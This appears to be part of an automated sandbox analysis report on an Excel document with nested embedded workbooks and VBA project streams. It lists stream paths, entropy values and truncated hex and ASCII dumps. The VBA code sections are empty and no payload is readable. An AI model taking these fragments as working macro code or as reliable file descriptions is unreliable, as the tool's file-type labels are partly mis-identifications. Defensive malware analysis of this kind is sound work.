      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: ThisWorkbook.cls, Stream Size: 985
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:200
      Entropy:3.268293668191049
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 8 . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
      Stream Path: MBD017EF320/\x1CompObj, File Type: data, Stream Size: 99
      General
      Stream Path:MBD017EF320/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF320/Package, File Type: Microsoft Excel 2007+, Stream Size: 11564
      General
      Stream Path:MBD017EF320/Package
      File Type:Microsoft Excel 2007+
      Stream Size:11564
      Entropy:7.132901381496351
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . . o . . . L . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a2 c8 b4 f4 6f 01 00 00 4c 05 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF321/\x1CompObj, File Type: data, Stream Size: 114
      General
      Stream Path:MBD017EF321/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF321/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:MBD017EF321/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF321/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200
      General
      Stream Path:MBD017EF321/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560418312417174
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF321/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99
      General
      Stream Path:MBD017EF321/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF321/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880
      General
      Stream Path:MBD017EF321/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF321/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951
      General
      Stream Path:MBD017EF321/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.683490359133683
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
      Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: MBD017EF321/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:520
      Entropy:5.18674908320575
      Base64 Encoded:True
      Data ASCII:I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 2 2 0 2 4 C A 1 4 C E 1 4 C E 1
      Data Raw:49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
      Stream Path: MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:104
      Entropy:3.0488640812019017
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
      Stream Path: MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2615
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:2615
      Entropy:3.966034925838034
      Base64 Encoded:False
      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
      Data Raw:cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: MBD017EF321/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:553
      Entropy:6.393413723460345
      Base64 Encoded:True
      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
      Stream Path: MBD017EF322/\x1CompObj, File Type: data, Stream Size: 114
      General
      Stream Path:MBD017EF322/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF322/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:MBD017EF322/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF322/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200
      General
      Stream Path:MBD017EF322/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560271435258422
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF322/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99
      General
      Stream Path:MBD017EF322/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF322/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880
      General
      Stream Path:MBD017EF322/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF322/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951
      General
      Stream Path:MBD017EF322/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.683500296443008
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
      Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
